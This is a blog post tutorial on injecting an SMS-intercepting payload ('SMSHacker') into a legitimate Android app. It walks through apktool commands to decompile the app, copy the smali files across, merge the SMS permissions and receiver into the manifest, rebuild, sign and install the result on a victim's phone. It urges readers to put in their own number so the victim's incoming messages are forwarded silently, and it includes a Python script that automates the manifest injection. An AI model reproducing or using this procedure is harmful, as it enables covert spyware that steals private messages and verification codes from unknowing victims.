Notice

Thursday, September 5, 2013

Android Malware Injection into Original Apps in Ubuntu


This is a post I originally published on my other blog, Insider Attack.

In this post I am going to describe how a malicious app can be injected into an original (legitimate) app on Ubuntu. For this post I have created a small malicious app that intercepts incoming SMS messages and forwards them to another number without the victim knowing that a message has arrived. You need the following files to do this:

  • APKtool (for Windows, you may need to download a Windows version of apktool here)
  • SignAPK.jar + keys
  • Malicious SMSHacker.apk app
You can download all of these files from this link:

Here is a rough sketch of the process:
  1. Decompile the original Android app (.apk) using apktool
  2. Decompile the malicious Android app (SMSHacker.apk) using apktool
  3. Inject the decompiled malicious app's files into the decompiled original app (copy the malicious smali files across)
  4. Inject the permissions and the <receiver> declaration from the malicious app's AndroidManifest.xml into the original app's AndroidManifest.xml
  5. Recompile the infected original app using apktool
  6. Sign the recompiled app using signapk.jar
  7. Install the recompiled, signed apk on the victim's device
Let's follow the listed steps;

Step 1:

    Download all the files from the mediafire link above; I have included everything required, including the sample SMSHacker app for testing. Copy all of the files into a single directory.

Copy the apk file into which you want to inject SMSHacker into the same directory. You can keep the apk in a directory of your own, but then you need to give its path explicitly in the following command.

Open a terminal and change into that directory. Run the following command to decompile your original apk file (the Android app). Let's say your original apk file is named myapp.apk:

./apktool d myapp.apk MyAppDec

In the above command the 'd' switch means decode (decompile) myapp.apk. 'MyAppDec' names the directory, in the same folder, into which the decompiled app is written. (This positional output directory is apktool 1.x syntax; apktool 2.x takes the output directory with the -o option instead: apktool d myapp.apk -o MyAppDec.)

Step 2:

Now decompile your malicious file too (SMSHacker.apk);

./apktool d SMSHacker.apk SMSHackerDec

You will then see two directories, SMSHackerDec and MyAppDec, in the same folder, containing the decompiled files.

Step 3:

If you browse these folders, you will notice a folder called smali in both. It holds the app's code: apktool disassembles the Dalvik bytecode in classes.dex into .smali files, one per class (smali is a human-readable assembly language for Dalvik, not Java source, so what you get is closer to a disassembly than a decompilation). Now go into the folder that holds the smali files of the malware (SMSHacker) with this command (the path is relative to the working directory, so there is no leading slash):

cd SMSHackerDec/smali/com/sms/smshacker/

Then open SMSHacker.smali file in gedit.

gedit SMSHacker.smali

I created this malware and tested it on emulators, so I set the SMS forwarding number to '5554', the console port of the first emulator instance, which is also the "phone number" emulators use to send SMS to each other. Change it to your own number and all of the victim's incoming messages will be forwarded to you. Search for the string '5554' in SMSHacker.smali and replace it with your preferred number (say, your backup phone :D).

Now copy the malicious files into the decompiled original app's files. Go back up to the working directory first (five levels from smshacker/):

cd ../../../../../
cp -R SMSHackerDec/smali/com/* MyAppDec/smali/com/

If the original app has no smali/com directory, create it first with mkdir -p MyAppDec/smali/com. The payload's package (com.sms.smshacker) must not collide with any package already present in the original app, otherwise the copy overwrites the app's own classes and the rebuilt app will misbehave or crash.

You have now injected the files into the original app's folder. Next we need to inject the permissions that SMSHacker requires from its AndroidManifest.xml into the original app's AndroidManifest.xml.

Step 4:

Open SMSHacker's AndroidManifest.xml file in gedit.

gedit SMSHackerDec/AndroidManifest.xml

You will see three lines like these in the file:


    <uses-permission android:name="android.permission.RECEIVE_SMS" />
    <uses-permission android:name="android.permission.SEND_SMS" />
    <uses-permission android:name="android.permission.READ_PHONE_STATE" />

The third permission is not actually needed for this purpose. So copy the first two lines into MyAppDec/AndroidManifest.xml before the <application> tag, skipping any permission the original app already declares. Note that on Android 6.0 and later RECEIVE_SMS and SEND_SMS are runtime permissions: an app targeting API 23 or higher will not get SMS broadcasts until the user has granted them.

You will also see a few lines like the following inside the malicious app's AndroidManifest.xml:

<receiver android:name="com.sms.smshacker.SMSHacker">
    <intent-filter>
        <action android:name="android.provider.Telephony.SMS_RECEIVED" />
    </intent-filter>
</receiver>

Copy this block into MyAppDec/AndroidManifest.xml inside the <application> tag, before the first <activity> tag.

Now save MyAppDec/AndroidManifest.xml and close gedit.

We have now successfully injected the files, permissions and receiver, and can recompile the new app using apktool.
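Doing step 4 by hand in gedit is where mistakes creep in: a permission pasted inside <application>, a receiver pasted outside it, or entries duplicated when you repeat the procedure on the same app. The following script is an example added for this page, not code from the original post or from apktool. It performs the merge described above on two decoded manifests: it copies the payload's <uses-permission> entries to manifest level before <application>, skipping READ_PHONE_STATE as the post does and skipping anything the host already declares, and copies the payload's <receiver> block inside <application> before the first <activity>. The two sample manifests embedded in it are constructed to look like apktool's decoded output; the host package name com.example.myapp and the merge_files helper are assumptions for illustration.

```python
import sys
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
ANAME = "{%s}name" % ANDROID_NS
# Without this, ElementTree writes the prefix back out as 'ns0:' instead of 'android:'.
ET.register_namespace("android", ANDROID_NS)

# Permissions the payload declares but the injected receiver never uses;
# the post drops READ_PHONE_STATE, so we do too.
SKIP_PERMISSIONS = {"android.permission.READ_PHONE_STATE"}


def merge_manifests(host_xml, payload_xml):
    """Return host_xml with the payload's permissions and receivers added.

    Entries the host already declares are not duplicated, so running this
    twice on the same manifest changes nothing the second time.
    """
    host = ET.fromstring(host_xml)
    payload = ET.fromstring(payload_xml)
    host_app = host.find("application")
    payload_app = payload.find("application")
    if host_app is None or payload_app is None:
        raise ValueError("both manifests need an <application> element")

    # 1. <uses-permission> lives at manifest level; insert just before <application>.
    have = {p.get(ANAME) for p in host.findall("uses-permission")}
    pos = list(host).index(host_app)
    for perm in payload.findall("uses-permission"):
        name = perm.get(ANAME)
        if name in have or name in SKIP_PERMISSIONS:
            continue
        host.insert(pos, perm)
        pos += 1
        have.add(name)

    # 2. <receiver> lives inside <application>; insert before the first
    #    <activity>, which is where the post tells you to paste it by hand.
    have = {r.get(ANAME) for r in host_app.findall("receiver")}
    first_activity = host_app.find("activity")
    pos = list(host_app).index(first_activity) if first_activity is not None else len(host_app)
    for recv in payload_app.findall("receiver"):
        name = recv.get(ANAME)
        if name in have:
            continue
        host_app.insert(pos, recv)
        pos += 1
        have.add(name)

    return ET.tostring(host, encoding="unicode")


def permission_names(manifest_xml):
    """Names of the <uses-permission> entries, in document order."""
    return [p.get(ANAME) for p in ET.fromstring(manifest_xml).findall("uses-permission")]


def application_children(manifest_xml):
    """(tag, android:name) of each direct child of <application>, in order."""
    app = ET.fromstring(manifest_xml).find("application")
    return [(c.tag, c.get(ANAME)) for c in app]


# Constructed sample input: a host app (hypothetical package com.example.myapp) as apktool decodes it.
HOST_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.myapp">
    <uses-permission android:name="android.permission.INTERNET" />
    <application android:label="@string/app_name">
        <activity android:name="com.example.myapp.MainActivity">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />
                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>
    </application>
</manifest>
"""

# Constructed sample input: the SMSHacker manifest, as quoted in the post.
PAYLOAD_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.sms.smshacker">
    <uses-permission android:name="android.permission.RECEIVE_SMS" />
    <uses-permission android:name="android.permission.SEND_SMS" />
    <uses-permission android:name="android.permission.READ_PHONE_STATE" />
    <application android:label="SMSHacker">
        <receiver android:name="com.sms.smshacker.SMSHacker">
            <intent-filter>
                <action android:name="android.provider.Telephony.SMS_RECEIVED" />
            </intent-filter>
        </receiver>
    </application>
</manifest>
"""


def merge_files(host_path, payload_path):
    """Assumed helper: rewrite the manifest at host_path in place."""
    with open(host_path, encoding="utf-8") as f:
        host_xml = f.read()
    with open(payload_path, encoding="utf-8") as f:
        payload_xml = f.read()
    with open(host_path, "w", encoding="utf-8") as f:
        f.write('<?xml version="1.0" encoding="utf-8"?>\n')
        f.write(merge_manifests(host_xml, payload_xml))


if __name__ == "__main__":
    if len(sys.argv) == 3:
        merge_files(sys.argv[1], sys.argv[2])
    else:
        print(merge_manifests(HOST_MANIFEST, PAYLOAD_MANIFEST))
```

Run it as python merge_manifest.py MyAppDec/AndroidManifest.xml SMSHackerDec/AndroidManifest.xml to rewrite the original app's manifest in place, or with no arguments to print the merged sample. The script registers the android namespace so the rewritten file keeps the conventional android: prefix rather than ElementTree's ns0:.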

Step 5:

Go back to the directory where apktool and the other files are and run apktool to recompile the app.

./apktool b -f MyAppDec myhackedapp.apk

The 'b' switch means build and '-f' means force: apktool normally rebuilds only the files it detects as changed, and -f makes it rebuild everything, which avoids trouble with stale build state. (With apktool 2.x the output file is given with -o instead: apktool b -f MyAppDec -o myhackedapp.apk.)

After running that command you will see a new file, myhackedapp.apk, in the same folder.

Step 6:

We need to sign the app with signapk.jar before installing it. Signing is mandatory: Android refuses to install an unsigned apk on a device or an emulator. Two things to keep in mind: testkey.pk8 and testkey.x509.pem are the publicly known AOSP test keys, so anything signed with them is trivially recognisable as such, and because the repackaged app no longer carries the original developer's signature it cannot be installed over the original app (the package manager rejects it with INSTALL_FAILED_UPDATE_INCOMPATIBLE), so the original has to be uninstalled first.

Sign the apk with the following command:

java -jar signapk.jar testkey.x509.pem testkey.pk8 myhackedapp.apk myhackedapp-signed.apk

You will see your signed apk, myhackedapp-signed.apk.

Now we are done. We can install this apk on any device and let the victim run the malicious code.

SMSHacker.apk is really just an app with a BroadcastReceiver. When a message is received, the receiver is invoked and executes the code in its onReceive handler; I have put the code that forwards the message to another phone inside that handler. For this to work, the <receiver> declaration must be present in AndroidManifest.xml, which is why we injected the <receiver> block from the malicious manifest into the original manifest. We also need permission to read an incoming message (RECEIVE_SMS) and to send an SMS (SEND_SMS), so we injected those two permissions into the original app's manifest as well.

When installed, this appears as a normal app on the victim's device. The receiver starts working once the victim has run the app for the first time: since Android 3.1 a freshly installed app is in the "stopped" state and does not receive implicit broadcasts until it has been launched once. After that, even if the victim closes the original app, the receiver keeps listening for incoming SMS, because the system starts the app's process itself to deliver the broadcast.

I have included this as a module in the Android Exploitation Framework I am currently developing for a project. In that framework, one can choose from many types of payloads to inject into any original app.

Thanks for reading, and if there are any issues, post a comment below.
